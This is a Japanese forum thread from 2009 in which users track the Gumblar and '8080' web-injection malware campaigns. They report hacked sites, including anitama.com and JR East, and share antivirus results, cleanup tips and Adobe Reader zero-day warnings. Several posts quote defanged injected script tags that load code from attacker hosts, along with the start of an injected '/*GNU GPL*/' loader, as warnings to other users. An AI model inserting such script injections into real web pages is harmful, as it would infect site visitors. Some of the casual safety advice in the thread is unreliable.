政治板でN速+その他を生暖かく見守るスレ 90
http://namidame.2ch.net/test/read.cgi/seiji/1260544431/
142名無しさん@お腹いっぱい。:2009/12/13(日) 17:17:09
uac切ってたんじゃね?
143名無しさん@お腹いっぱい。:2009/12/13(日) 17:50:27
新型によるUACスルーが噂されているがどれも明確なソースがないんだよね
144名無しさん@お腹いっぱい。:2009/12/13(日) 18:07:51
ttp://q1w2e3.sakura.ne.jp/gumblarExploitExecChecker.htm
145名無しさん@お腹いっぱい。:2009/12/13(日) 18:47:10
>>143 確かに調べても見つからないね
対象なるとしたら7の方だろうね
ユーザー数適にw
146名無しさん@お腹いっぱい。:2009/12/13(日) 22:48:29
ttp://rd.rakuten.co.jp/cow/?R2=http%3A%2F%2Fitem.rakuten.co.jp%2Fbook%2F6264125%2F&D2=67.3294.35434.747890.10361762

これだけ、なぜかnoscriptのXSS遮断が働いたんだけど誤爆?
147名無しさん@お腹いっぱい。:2009/12/14(月) 01:43:09
>>138
<div class="pic_content">
<img src="/XXXXX/XXXX/XXXXX/XX/XXXXX●<script src=http://7o8●net></script>

a href、imgとかにも寄生してるから
148名無しさん@お腹いっぱい。:2009/12/14(月) 18:54:20
相談させて欲しい。

カスペさんが、とあるサイトで反応したのでソースを確認したら
<scipt sc=htt//apiwachara.com/images/gifimg.php ></script><body>
というものが入っていた。
ほぼ黒だと思ったので管理人に連絡。
旧GENOの対処だとだめなこと、ウィルスソフトもダメなこと、
カスペインストかニフティのオンラインスキャン等の手段があること、
レジストリ確認(http://xx2zz.blog77.fc2.com/blog-entry-131.html)法があることをメールに記載。

インデックスのみのこしてサイトを削除してくれたが、
・覚えのないタグが入っていた
・削除した
・PCに感染はみとめられない
・感染したわけではないが、念のため
との記載。
その告知ページに上記タグが埋め込まれてるあたりもうどうしたら。

GENOウィルスチェッカーみたいなものが反応してくれたら、信じてもらえるかもと思って
http://6130.web.fc2.com/xxx/
で確認してみたんだけど、「安全です」との結果が出てくる。

新しく作ったHTMLに寄生されている以上、黒で間違いないと思うんだけど、
簡単にわかってもらえる方法はないだろうか?
149名無しさん@お腹いっぱい。:2009/12/14(月) 19:39:02
>>148
前スレより引用。

612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/01(日) 23:53:21
>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ
150名無しさん@お腹いっぱい。:2009/12/14(月) 19:46:44
>>148
レジストリによる確認方法は隠蔽されるので、役に立たないと前スレで報告あり
リンク先にもそう記載されているので熟読すること

一応 >>10 の検知駆除ツールを紹介するがどこまで亜種に通用するかは分からない
そもそも感染していないPCからサイトのパスワードの変更をしないと何度でもスクリプトを挿入される
とりあえずSo-netのセキュリティ通信あたりでも管理人に見てもらって理解してもらうくらいか
ttp://www.so-net.ne.jp/security/
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094

>>149 の通り、管理人に知識がないと、まともな答えは返ってこないので無理かも
151148:2009/12/14(月) 21:04:11
>>149
わざわざひっぱってきてくれてありがとう。真理だな。
もう一回メールして理解してもらえないようならそうするわ。

>>150
レジストリの隠蔽もするとは…自分もよくよく読んでいなかった。指摘ありがとう。
教えてもらったことをふまえてもう一回メール送って説得してみるよ。
152名無しさん@お腹いっぱい。:2009/12/14(月) 21:21:43
>>151
ああそうだ
そのサイトの名前かURLでググってみると↓こういうの出ないかな

「このサイトはコンピュータに損害を与える可能性があります。」

出るようなら危険なサイトと認識されているわけだから
Googleの知名度で説得の材料になるかも・・・
153名無しさん@お腹いっぱい。:2009/12/14(月) 22:07:22
GENOウイルスチェッカーは使えないからaguse gwならいけるんじゃねと
思って試したけどダメだった

カスペはちゃんと反応するみたいだけどなあ
http://www.virustotal.com/jp/analisis/fcfaaad9b6ef22b72d2b6d26ff5c094499b2f1cb1f14c9201591c1140891102d-1260795794

もしかしたら本人以外のPCが感染してるかも
154名無しさん@お腹いっぱい。:2009/12/14(月) 22:45:02
google先生からゴルァしてもらいたいなら、
↓ここから該当のサイトURLを報告するよろし。
http://www.google.com/safebrowsing/report_badware/
155名無しさん@お腹いっぱい。:2009/12/14(月) 23:20:48
カスペはゲノには容赦ないな。
156148:2009/12/15(火) 00:23:26
おおお、一通り勉強しなおしてもどってきたら、さらにアドバイスが。
ありがとう!グーグル先生にも問い合わせてみるよ。

>>153
アドレス記入だとエラーが起こるんだけど、
ひょっとしてわざわざ148のウィルスをDLして確認してくれた?
もしそうなら、ほんとありがとう。
そうでない場合は、是非やりかた教えてください。
157名無しさん@お腹いっぱい。:2009/12/15(火) 01:05:50
>>156
本体はわからんけど攻撃スクリプトだけもらった
アドレス記入ってどういうこと?
直接ブラウザで見に行くのはやめといたほうがいいよ
404とかが返ってきたのならIP制限で拒否されたんじゃね
158148:2009/12/15(火) 02:11:40
>>157
Virustotalのアップロード部分に、.phpのURLを入れてみた。
size0で、対応してくれなかったから、パソコン内のファイルじゃないとだめなのかと思って。
「攻撃スクリプトだけもらう」のがどういうことかわからないし、
今の自分には無理だということはわかった。
何度もありがとう。

名無しにもどります。
159名無しさん@お腹いっぱい。:2009/12/15(火) 09:28:58
>>153
gumblarはphpでアクセス制御をしていて
同一ホストからの複数回のアクセスには404を返す。
aguseその他のゲートウェイ(つまりゲートウェイのIP)で
2回チェックするとそれ以降は無害判定になる。
(今は亡きソースチェッカーではproxyにチェック入れて引っかけていた)。
何度も何度も言ってるんだけど。
160名無しさん@お腹いっぱい。:2009/12/15(火) 09:30:54
追記。1回踏んじゃった後であらためて検体を拾いたいのなら
モデムリセットしてIPを変えるかてきとーなproxyを刺すとかすればよろし。
161名無しさん@お腹いっぱい。:2009/12/15(火) 19:43:23
声優個人の中村繪里子スレより。
ラジ関のアニラジサイトanitama.comがやられている模様

> 282 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:48:43 ID:TnBI7JUt0 Be:
> ありがとう、その辺が妥当かな?
> ちと聞いてみる。
>
> とはいえ、xnxx-com.nu.nl.w3-org.goldgolfbag.ruなんてドメイン使うってことないよね?

> 283 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:56:33 ID:7Tpx8wr40 Be:
> よくわからんけどキャッシュの方のソース見ると最後の一行が入ってないね

> 299 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:50:45 ID:zA943d8b0 Be:
> anitama.comのページ全部やられているような気がする。

> 300 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:52:16 ID:TnBI7JUt0 Be:
> >>297
> Adobe Readerを更新してなかったスタッフがいたんじゃないかなぁ。
> Javaと一緒にChangeLog.pdfってのも読み込ませようとしてたから、まず
> その辺かなという気がするよ。

http://changi.2ch.net/test/read.cgi/voiceactor/1260365719/
162名無しさん@お腹いっぱい。:2009/12/15(火) 19:45:47
先に書き込みありましね、勝手ながら注意喚起のため緊急浮上でage
163名無しさん@お腹いっぱい。:2009/12/15(火) 20:33:54
中村繪里子スレの住人です。

インターネットラジオのページだけは大丈夫のようです。
各ページからは直接リンクではなく、javascriptで別ウィンドウを開く作りなのが功を奏したか。
もし番組を聞かれる方は直接飛んだ方がいいかと。ttp://anitama.com/radio/radio.html
164名無しさん@お腹いっぱい。:2009/12/15(火) 21:11:02
アニやまのHPにアクセスしたらおかしくなった…
アンチウイルスソフトいれてないんだけどヤバイですか?
165名無しさん@お腹いっぱい。:2009/12/15(火) 21:38:08
Adobe Readerつかうより
Foxit Readerの方が安全と言えるだろうか
166名無しさん@お腹いっぱい。:2009/12/15(火) 21:46:15
>164
>1の「更新」関係で抜けがあったらご愁傷さま
167名無しさん@お腹いっぱい。:2009/12/15(火) 21:59:00
>>165
FoxitReaderにも似たような脆弱性なかったっけ
勘違いならスマソ
168名無しさん@お腹いっぱい。:2009/12/15(火) 22:07:43
SecuniaがAdobe Reader危ないとうるさい
169名無しさん@お腹いっぱい。:2009/12/15(火) 22:10:21
>>165
個人的には気休め程度には安全かと
Adobe Readerと同じ脆弱性が他のPDF Viewerにないとは言い切れないから
それより利便性は落ちるが、プラグインは切ってブラウザに連動させて見たりせずに
ダウンロードしてから見るようにしたほうが安全な気がする

あとゼロデイの脆弱性がAdobe Reader 9.2以下で発生している模様
詳細が不明なので対策しにくいが・・・
ttp://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html
170名無しさん@お腹いっぱい。:2009/12/15(火) 22:42:53
このウイルスって、同一LAN上のPCは感染しますか?
アニ●マをネットブック(Puppy Linux4.3.1-jp SeaMonkey 1.1.18)で表示していて(ネトラジを聴いていて)、
他の作業を同一LAN上の他のPC(WinXP 一応>>1の対応は済)でやっていたのですが。
念のためネットブックは隔離、様子見中。
171名無しさん@お腹いっぱい。:2009/12/15(火) 22:49:39
…めちゃくちゃおもたくなってきた。
まうすかーそるも長ゆっくりしか動かない
172名無しさん@お腹いっぱい。:2009/12/15(火) 22:52:48
アニオタがダイ終結してるのか
とりあえず再インストールして
>1の更新関連をしておけ

173名無しさん@お腹いっぱい。:2009/12/15(火) 22:57:58
>>170
Linuxでは感染しないので同一LAN上にWindowsがあっても大丈夫
またLAN上で動作するようなことは確認されていない
アップデートで対策をしているなら安心していい
174170:2009/12/15(火) 23:03:14
>>173
レスとんくす。
安心しました。Linuxでは感染しないのですね。
ほっとしました。
ちなみに>>171は自分ではありません。
175名無しさん@お腹いっぱい。:2009/12/15(火) 23:38:19
>>169
JavaScript切ればとりあえず回避できるとかあった

Adobe 0-day in the wild - again
http://isc.sans.org/diary.html?storyid=7747
176名無しさん@お腹いっぱい。:2009/12/15(火) 23:45:43
>>175

このスレの住民ならAcrobat Javascriptは切ってるだろうから問題ないな
177名無しさん@お腹いっぱい。:2009/12/15(火) 23:50:30
>>158
> Virustotalのアップロード部分に、.phpのURLを入れてみた。
これは無理

> パソコン内のファイルじゃないとだめなのかと思って。
そういうことです
アップロードしたファイルを確認できるのはそのファイルを持っている人だけ
VirusTotalからDLは不可能
DLできちゃったら危ないからね
178名無しさん@お腹いっぱい。:2009/12/16(水) 00:59:43
ところでアニたまのウイルスは本当にGumblar系か?
似てはいるがスクリプトの挿入位置や内容が違うような
いままで <script>/*GNU GPL*/ こんなのなかったしカスペで反応しない・・・
あるいは新型のスクリプトなのか

結果: 0/41
ttp://www.virustotal.com/jp/analisis/dc4976e67b5e917aa732cbec56d3cd9d6ec8066a39ff75228fbac00aa4464ce6-1260889054
179名無しさん@お腹いっぱい。:2009/12/16(水) 01:04:21
糞ジャンクショップ GENO 閉店…店舗販売を終了しWeb販売のみに
http://tsushima.2ch.net/test/read.cgi/news/1260873784/

やっぱ例の事件の影響があったのかな?
180名無しさん@お腹いっぱい。:2009/12/16(水) 01:59:40
>>178
本体じゃないから反応しないだろ
ノートンで行くと反応した
181名無しさん@お腹いっぱい。:2009/12/16(水) 02:32:41
>>180
なるほど本体バイナリは同じか
スクリプトが大きく変わったんだな
182名無しさん@お腹いっぱい。:2009/12/16(水) 07:29:19
>>161-163
これはいわゆる8080系イジェクションで、gumblar(geno)じゃないよ。
使う脆弱性はおなじみFlashやAcrobatなので対策は同じ。
183名無しさん@お腹いっぱい。:2009/12/16(水) 07:37:20
>>176
ついでに。
ttp://www.shadowserver.org/wiki/pmwiki.php/Calendar/20091214
Right now only 5 out of the 41 different Antivirus vendors used by Virustotal are detecting this threat.
Even then their detection appears to be generic and is not currently specifically detecting this exploit.
The 5 vendors to detect the threat are:
(McAfee-GW-Edition) *note this is not the same as McAfee Desktop or Mail Server Edition
(eSafe)
(NOD32)
(AntiVir)
(Kaspersky)

補足するとMcAfeeのGWは旧Webwasherで、McAfee+何かという構成で
VirusTotalのはMcAfee+AnviVir。実質4ベンダー。
eSafeがKasperskyオプション付きなら実質3ベンダー。
184名無しさん@お腹いっぱい。:2009/12/16(水) 07:43:24
ほい、anitamaの初段スクリプト。
ttp://www.virustotal.com/analisis/bc7de3f780916aeb7733fa846131d0b94c61f62e16feb140b278715d5c01015f-1260916937
185名無しさん@お腹いっぱい。:2009/12/16(水) 07:45:16
アニたまスレにもレスしたけど、こっちにも
いつもGumblar追っかけてくれてる人が検証してくれてた

「アニたまどっとコム」のサイトが改ざん被害。さまざまな脆弱性を突く処理が・・・
ttp://blogs.yahoo.co.jp/noooo_spam/59274371.html

上にもあるようにGumblarではないけど、Gumblarよりもタチ悪いかもな
ってことでこれ以上はここではスレチか
186名無しさん@お腹いっぱい。:2009/12/16(水) 07:48:36
>>184
さっき誤ってアニたまに飛ぼうとしてカスペ先生が遮断してくれたとこだぜw
まあ砂箱内のブラウザで、js切った状態だったから飛んでも問題なかっただろうが
187名無しさん@お腹いっぱい。:2009/12/16(水) 08:06:07
いちおanitamaのスクリプトは各社に提出済みです。
バスターはトレンドマイクソの鯖がおかしいんで送れてないけど。
188名無しさん@お腹いっぱい。:2009/12/16(水) 09:49:45
>>185
スレチではあるが同じ脆弱性も突いているウイルスだから
ここでもアリのような気もする・・・ウイルス総合スレなんてないしな
189名無しさん@お腹いっぱい。:2009/12/16(水) 11:46:30
アニヲタ撲滅運動か??
190名無しさん@お腹いっぱい。:2009/12/16(水) 13:50:31
>184
今はカスペだけか、恐いな
191名無しさん@お腹いっぱい。:2009/12/16(水) 13:56:07
検出の仕方にもよるからカスペだけとは限らない
現にノートンでも検出する
192名無しさん@お腹いっぱい。:2009/12/16(水) 14:48:27
アンラボ?とかいうので駆除してみたんでもう大丈夫ですかね??
193名無しさん@お腹いっぱい。:2009/12/16(水) 20:20:31
>>188
ページ改竄の総合情報スレ的なものってないのかな?

ちなみにアニたまは公式アナウンス来た
一応あのスクリプトは取り除いたみたいだが、まだ調査中の模様
完全に安全になりました、とは言えないな・・・
194名無しさん@お腹いっぱい。:2009/12/16(水) 22:03:13
>>189
むしろ頑張れって感じだなw
195名無しさん@お腹いっぱい。:2009/12/16(水) 22:44:44
>>193
アニたまに関しては、今のところスレチだ他でやれ的なレスも
ないようだからここでやってもよさそうだ

しかし、ページ改竄の被害が身近になってくると
総合情報スレ的なものが欲しくなるな
新しく立てても過疎りそうだから個人的には
次スレはこれを考慮に入れたスレにしたいものだが
196名無しさん@お腹いっぱい。:2009/12/16(水) 22:49:57
スレチだ他でやれ
197名無しさん@お腹いっぱい。:2009/12/16(水) 23:31:08
ああいうとやっぱりこういうレスがつくよなw
198名無しさん@お腹いっぱい。:2009/12/16(水) 23:37:07
アニたまのは音楽ファイル自体は大丈夫なのかのう。
199名無しさん@お腹いっぱい。:2009/12/17(木) 00:16:09
>195
アニたまはいい加減スレチとして、確かに>193の「インジェクション総合スレ」っぽいのは見たい
欲張って「マルウェア・ウイルス総合スレ」にしちゃうと、分量・速度的にキリが無さそうだしな
200名無しさん@お腹いっぱい。:2009/12/17(木) 00:23:39
ブラウジングウイルス対策総合スレ
201名無しさん@お腹いっぱい。:2009/12/17(木) 00:28:39
>>199
たしかに欲張ると質問が押し寄せて収拾つかなくなりそうだ
ただ、範囲を絞りすぎると過疎が怖いしな・・・
検索で見つけやすいスレタイやテンプレの問題もあるが
202名無しさん@お腹いっぱい。:2009/12/17(木) 00:47:06
【Gumblar】Webウイルス対策総合スレ【8080】
203名無しさん@お腹いっぱい。:2009/12/17(木) 01:03:34
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】

ではどう? GENOと改竄を入れた方が分かり易いと思う。
204名無しさん@お腹いっぱい。:2009/12/17(木) 01:11:09
なんか建てるならブラウザ戦争おこさないようにテンプラ気をつけろ
205名無しさん@お腹いっぱい。:2009/12/17(木) 02:06:07
ここ来る連中にちょろいやつはいないだろうからもうここイラネ
206名無しさん@お腹いっぱい。:2009/12/17(木) 02:35:09
【Gumblar/GENO】Web改竄ウイルス情報総合スレ【8080】

ちょっと長いけどこれでどうだ?
情報って言葉を入れることであくまでも第一報やそれに準じる大まかな情報のみ扱う
で、被害が大きかったり細かい対策で情報量が増えていくようだったら
そのウイルスごとに別スレを立てて誘導していくって感じ



207名無しさん@お腹いっぱい。:2009/12/17(木) 03:25:11
内容はこんな感じでどうだろ?
一応このスレの改変してテンプレも作っているが
自分も詳しいわけではないのでアップデート対策と
Gumblarについてしかまとめていない

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
被害が増加しているようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080、JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***



あとブラウザについてだが

■ ブラウザでJavascriptの使用を基本無効に設定
・Internet Explorer ツール → インターネット オプション →
 → セキュリティ・タブ → このゾーンのセキュリティのレベルを「高」に
・Firefox NoScriptを導入する
・Google Chrome -disable-javascriptで起動。
・Opera ツール → クイック設定 → 「JavaScriptを有効にする」のチェックを外す

こうしているが他にいい案はないかな
208名無しさん@お腹いっぱい。:2009/12/17(木) 05:11:13
>>207
だからそういう風に書くから粘着馬鹿につけ込まれるんだって。
個人的にはブラウザ関連の記述はあえてテンプレからは外すようにした方がいいと思うけど
どうしても入れたいなら

■ ブラウザでJavascriptの使用を基本無効に設定
・Internet Explorer ツール → インターネット オプション →
 → セキュリティ・タブ → このゾーンのセキュリティのレベルを「高」に
・Firefox ツール→オプション→コンテンツ→ 「JavaScriptを有効にする」のチェックを外す
・Google Chrome -disable-javascriptで起動。
・Opera ツール → クイック設定 → 「JavaScriptを有効にする」のチェックを外す

とした方がいい。
209名無しさん@お腹いっぱい。:2009/12/17(木) 06:52:58
なんでわざわざIE厨の機嫌取らないといけないんだよ
210名無しさん@お腹いっぱい。:2009/12/17(木) 07:01:48
まあでもJavaScriptの無効方法のテンプレなのに、NoScriptが対処方法ってのはおかしいな
ブラウザ単体で切ること自体はできるんだから
211名無しさん@お腹いっぱい。:2009/12/17(木) 07:09:53
なんでわざわざ火狐厨の機嫌取らないといけないんだよ
212名無しさん@お腹いっぱい。:2009/12/17(木) 08:15:43
こういうのがいるからだろ
213名無しさん@お腹いっぱい。:2009/12/17(木) 08:49:54
IEでも火狐でも、どーでもいいわい
214名無しさん@お腹いっぱい。:2009/12/17(木) 10:27:53
>>208-213

・WebブラウザのJAVAScriptを切っておく
※切り方はググれカス(勝手に調べて下さい)

これでどないだ?(苦笑)
215名無しさん@お腹いっぱい。:2009/12/17(木) 11:41:20
共通の敵がいるのになんで内紛せにゃならんのだ
216207:2009/12/17(木) 12:21:34
ご意見どうも
ブラウザに関しては利便性の問題もあるので
応用的なことは外すほうがいいか
あまり代わり映えしないが扱う範囲が広くなるからよしとして
アップデートとGumblarくらいのシンプルなものにするかね
あとは誰か詳しい人が追加してくれるだろうし

それと
・QuickTime・RealPlayer等の更新
・VirusTotal・VirSCAN.org
・サイトチェッカー
・オンラインスキャン

このあたりは入れていないがいいかな?
とりあえず立てるにしてもいろいろ意見は欲しいところ
217名無しさん@お腹いっぱい。:2009/12/18(金) 11:46:37
>>700
その共有ボタンに登録した情報から動向を探るのが本当の目的だろ
いつもの収集作業だな
218名無しさん@お腹いっぱい。:2009/12/18(金) 11:49:01
ごばったけど過疎ってるしまぁいいか…
219名無しさん@お腹いっぱい。:2009/12/18(金) 12:23:30
過疎ってないよ
220名無しさん@お腹いっぱい。:2009/12/18(金) 12:26:32
動きがないと過疎るからなあ
総合スレは次になにかあったときのほうがいいかもな・・・
221名無しさん@お腹いっぱい。:2009/12/19(土) 03:57:44
水面下で着々と怠惰な情弱共が喰われていってるくらいだな
事前に最低限の対策をしていれば当面の間は問題ない
222名無しさん@お腹いっぱい。:2009/12/19(土) 12:12:49
今GENOサイトがメンテナンス中なんだが、
また何かあったのか?と疑ってしまう・・・
223名無しさん@お腹いっぱい。:2009/12/19(土) 18:24:13
メンテナンスはメンテナンスですしおすし
224名無しさん@お腹いっぱい。:2009/12/20(日) 21:35:28
よく分からんが、恐らく感染してるっぽいが、userフォルダをusbメモリに退避して、osクリーンインストールでおk?
225名無しさん@お腹いっぱい。:2009/12/20(日) 22:02:39
その退避したファイルが〜ってオチですね
226名無しさん@お腹いっぱい。:2009/12/21(月) 01:04:28
USBメモリが別のにやられてそうだよね
227名無しさん@お腹いっぱい。:2009/12/21(月) 04:40:41
HijackThisのログで拾ってくれないかな?
感染した人、試してみて
228名無しさん@お腹いっぱい。:2009/12/21(月) 05:50:49
>>227
VirtualBox上で感染させたちょっと古いやつだけど、HijackThisのログでは拾えなかった
229名無しさん@お腹いっぱい。:2009/12/21(月) 21:35:55
thx
やっぱり駄目か・・
230名無しさん@お腹いっぱい。:2009/12/21(月) 23:52:31
つかワクチンで対処ができないとかjavaって欠陥ソフトやん、どうにかしろや
231名無しさん@お腹いっぱい。:2009/12/22(火) 09:22:26
ワクチンとかアンチウイルスとかが既に幻想
UACも、ウイルス系の8割が突破、通常アプリの8割がブロック

自分の責任じゃないとか言ってるうちにWindows滅びますぜ ゲイツさんよ
232名無しさん@お腹いっぱい。:2009/12/22(火) 12:05:42
>231
MSEを無料で作る程度には、責任感じてる気もする
肝心のMSEの性能はシラネ
233名無しさん@お腹いっぱい。:2009/12/22(火) 13:46:02
MSEやその前身のOneCareもどこかよその企業をいくつか買収しただけだったりする。
234名無しさん@お腹いっぱい。:2009/12/22(火) 23:37:25
ソープ板から すまんこ。
アニたま系と同じやつだとおもうのだけど(ソープ店HP)
//santafe.santafe-group.com/index.html 内の最後の方のアクセス解析スクリプト
//santafe.santafe-group.com/acc/xenoLogger.js
が乗っ取られてるみたいで ロシアにご案内されてしまう。

地味に被害が広がっていて、管理者側も依然手を打ってない模様。

専用スレでも立ててage放しにして警告しといたほうがいいのかな?
3行ほどでアドバイスいただけないかしら。
235名無しさん@お腹いっぱい。:2009/12/22(火) 23:38:45
>>231
ゲイツは08年6月27日に退職しとるがな
236名無しさん@お腹いっぱい。:2009/12/22(火) 23:56:55
>>234
Gumblarじゃない
--
document.write(acCODE); /*GNU GPL*/ try{window.onload = function(){var 以下略
--
参照
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102
237名無しさん@お腹いっぱい。:2009/12/23(水) 02:51:35
>231
OS・アプリ・Flashの更新関係は全部チェック、ブラウザも極力最新版を
無料でもセキュソフトは必須、未対策は感染を広げる(偽セキュソフトに注意)
不安ならブラウザとPDFソフトのJavascriptはOFF、後者は常時OFFでもいい

ほい、3行
できる・やるべき対策はGumblarと同じ
238名無しさん@お腹いっぱい。:2009/12/23(水) 02:53:02
>237は>234宛だった
239名無しさん@お腹いっぱい。:2009/12/23(水) 04:04:08
言ってることは正しいんだが、安価ぐらいちゃんと打とうよ・・・

しかしGNU GPLで始まるスクリプトのインジェクション、じわじわと拡がってるみたいね
もう1個ぐらい有名サイトが陥落でもしたら、総合スレ立てても良いような
240234:2009/12/23(水) 04:41:13
>>236-239
色々ありがとう。
メディアでの記事も参考になったし、Adobe Readerでjavaスクリプトとかあるの知らなかった。

最後にもうひとつだけ質問させて。
コレって、サーバーに侵入されて書き換えられてるの?
それとも、保守用のPCが何らかの感染しているの?
241名無しさん@お腹いっぱい。:2009/12/23(水) 05:13:34
両方あり得るし、それは管理者じゃないとわからん。
242名無しさん@お腹いっぱい。:2009/12/23(水) 07:41:40
管理者のPCが感染
→鯖の管理アカウントが漏洩
 →鯖に仕掛けられる
   →それを見た別の管理者のPCが感染
の永久ループだろ

ちなみに、adobe readerは全バージョンセキュリティホール放置中、対策版は恐らく来月中旬
攻撃コードの作り方が簡単過ぎて笑ったので、年末年始に流行りそうな予感
243名無しさん@お腹いっぱい。:2009/12/23(水) 08:11:44
年末年始を狙ってくるのは確実だろうなあ
んで改ざんされたサイトの管理人が休暇中で、ウイルスばらまいた状態になったままとかorz

ところでJR東日本の公式サイトが改ざんされたとかでサービス停止してる
ttp://www.mbs.jp/news/jnn_4315368_zen.shtml
244名無しさん@お腹いっぱい。:2009/12/23(水) 08:15:17
ttp://sorry.jreast.co.jp/
JR東もやられたっぽい。
只今メンテ中。
245234:2009/12/23(水) 09:14:51
>>241,242
ありがとう。>>239さんの通りじわじわ拡大してるようですね。
件の管理者も早く気付いて欲しいところです。
246名無しさん@お腹いっぱい。:2009/12/23(水) 13:16:32
管理者自身、geno技術がすごすぎて手が打てないんだろ
247名無しさん@お腹いっぱい。:2009/12/23(水) 13:26:21
JR東のサイト内検索窓に改ざん 運用停止
http://www.fnn-news.com/news/headlines/articles/CONN00168905.html
社内で調査したところ、外部からの不正なアクセスがあったほか
改ざんされた画面などにアクセスした場合、ウイルスに感染するおそれもあるという。
248名無しさん@お腹いっぱい。:2009/12/23(水) 13:35:31
この際、javaやめてnet frameでええよ
249名無しさん@お腹いっぱい。:2009/12/23(水) 15:15:27
Gumblar撤退?
http://blogs.yahoo.co.jp/noooo_spam/archive/2009/12/23
--
asianmotors●co●in ←危険
ここって、インジェクションの実験場に使われてる?
*GNU GPL*に酷似した(同じ?)
<script>/*CODE1*/ try{window.onload = function(){var
こんなのが転がってるんだが・・・
※Gumblarは残ったまま
250名無しさん@お腹いっぱい。:2009/12/23(水) 15:36:53
ここも凄い事になってるなw
tp://www●cafekamrans●co●uk/
251名無しさん@お腹いっぱい。:2009/12/23(水) 17:03:10
>>249-250
どんな感じなんだ
一回見てみたいんだがチキンだから見れない画像うpしてください^q^
252名無しさん@お腹いっぱい。:2009/12/23(水) 19:13:18
Firefoxで頭にview-source:付ければいいだろ
253名無しさん@お腹いっぱい。:2009/12/23(水) 19:19:58
>>249
code1は8080系だね。前はGNU GPLとか書いてた奴。
254名無しさん@お腹いっぱい。:2009/12/23(水) 19:20:48
上げてください^q^
255名無しさん@お腹いっぱい。:2009/12/23(水) 20:03:53
自分で見れないレベルなら見てもわからんと思うよ
256名無しさん@お腹いっぱい。:2009/12/23(水) 20:36:48
>>251
249と250もチキンだからな
257名無しさん@お腹いっぱい。:2009/12/24(木) 00:08:42
JR東日本のサイト改ざんはGamblar亜種
ttp://www.jreast.co.jp/apology/20091223_restart.html

不正アクセスにより改ざんされたページ及び期間
JR東日本ホームページ内キーワード検索
2009年12月8日(火)21:40〜12月21日(月)23:55
大人の休日倶楽部内の東京講座ページ
2009年12月18日(金)11:00〜12月22日(火)21:00
258名無しさん@お腹いっぱい。:2009/12/24(木) 00:10:22
久々に見にきてみれば、JRもGENOか
259名無しさん@お腹いっぱい。:2009/12/24(木) 00:14:58
検索だけじゃなかったのか
260名無しさん@お腹いっぱい。:2009/12/24(木) 00:15:32
>>256
よう、腰抜けw
261名無しさん@お腹いっぱい。:2009/12/24(木) 00:15:40
スペル覚えにくいけどGumblarね
262名無しさん@お腹いっぱい。:2009/12/24(木) 00:21:57
>>261
Gumblarなのね、覚えた
263名無しさん@お腹いっぱい。:2009/12/24(木) 00:45:10
>>256
ほっといたらいい
URLしか貼り付けれない奴らだから
264名無しさん@お腹いっぱい。:2009/12/24(木) 01:12:37
GENO怖くて4月からもうずっと専ブラで2chとふたば見るだけのネット生活だ…
265名無しさん@お腹いっぱい。:2009/12/24(木) 01:59:27
【GENO出世】JR東のサイトにアクセスしたユーザーにGENOウイルス感染の恐れ
http://tsushima.2ch.net/test/read.cgi/news/1261575712/
266名無しさん@お腹いっぱい。:2009/12/24(木) 02:11:52
GENOウイルススレ 23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
267名無しさん@お腹いっぱい。:2009/12/24(木) 02:12:34
>>266
誤爆したスマソ
268名無しさん@お腹いっぱい。:2009/12/24(木) 05:34:59
ここまでGENOで定着してしまうとはね・・・アメリカの企業だったら名誉毀損で訴訟起こすレベルw
そりゃインジェクションされたGENO側が悪いのも分かるけどさ・・・
JRが真っ先にやられてたらJRウイルスとでも言われてたのだろうか?
269名無しさん@お腹いっぱい。:2009/12/24(木) 06:23:31
>>261

「ガンバレー」に見えてしまう
270名無しさん@お腹いっぱい。:2009/12/24(木) 10:32:08
ガンプラに見えてしまわない
271名無しさん@お腹いっぱい。:2009/12/24(木) 11:27:12
機動戦士Gumblar
272名無しさん@お腹いっぱい。:2009/12/24(木) 12:07:08
vistaでDaonol感染した。
UAC切ってたからだと思う。
7のインストールディスクのコマンドプロンプト使ったが、midi9がないので、更なる亜種みたいだわ。
復元ポイントに戻ればいいみたいだが、生憎vistaのインストールディスクがなくてなおしようがない…
273名無しさん@お腹いっぱい。:2009/12/24(木) 12:32:33
>>272
Vistaで応用できるか分からんが、KNOPPIXから修復する方法がある
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
274名無しさん@お腹いっぱい。:2009/12/24(木) 19:41:07
JR東日本のサイト改ざん、Gumblarの亜種は間違いで/*GNU GPL*/らしいな
Gumblarが撤退をしているようだから、これから8080系が流行るのか・・・
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/#20091224__JR
275名無しさん@お腹いっぱい。:2009/12/24(木) 19:47:30
8080系って電車みたいだな
276名無しさん@お腹いっぱい。:2009/12/24(木) 20:16:13
>>272
midi9見えてないだけかもよ
277名無しさん@お腹いっぱい。:2009/12/24(木) 20:16:56
>>268
GENOは対応の仕方がまずすぎたな
278名無しさん@お腹いっぱい。:2009/12/24(木) 22:57:28
>>273
ありがとう、試してみる。

>>276
ん〜、削除しようとしても見つからないって言われるし、展開してみても見つからないんで、とりあえず>>273が教えてくれたのを試してみる。
279名無しさん@お腹いっぱい。:2009/12/24(木) 23:16:39
今度はJREか…
280名無しさん@お腹いっぱい。:2009/12/25(金) 00:33:55
>279
3秒くらい、JR東日本とJavaランタイムのどっちか混乱した
281名無しさん@お腹いっぱい。:2009/12/25(金) 03:33:03
今度の8080系がアニたまウイルスと命名されないか、心配だぜ
なんかso-netの記事見てると、分かりやすくするためだろうがやけにアニたまって言葉使ってて・・・
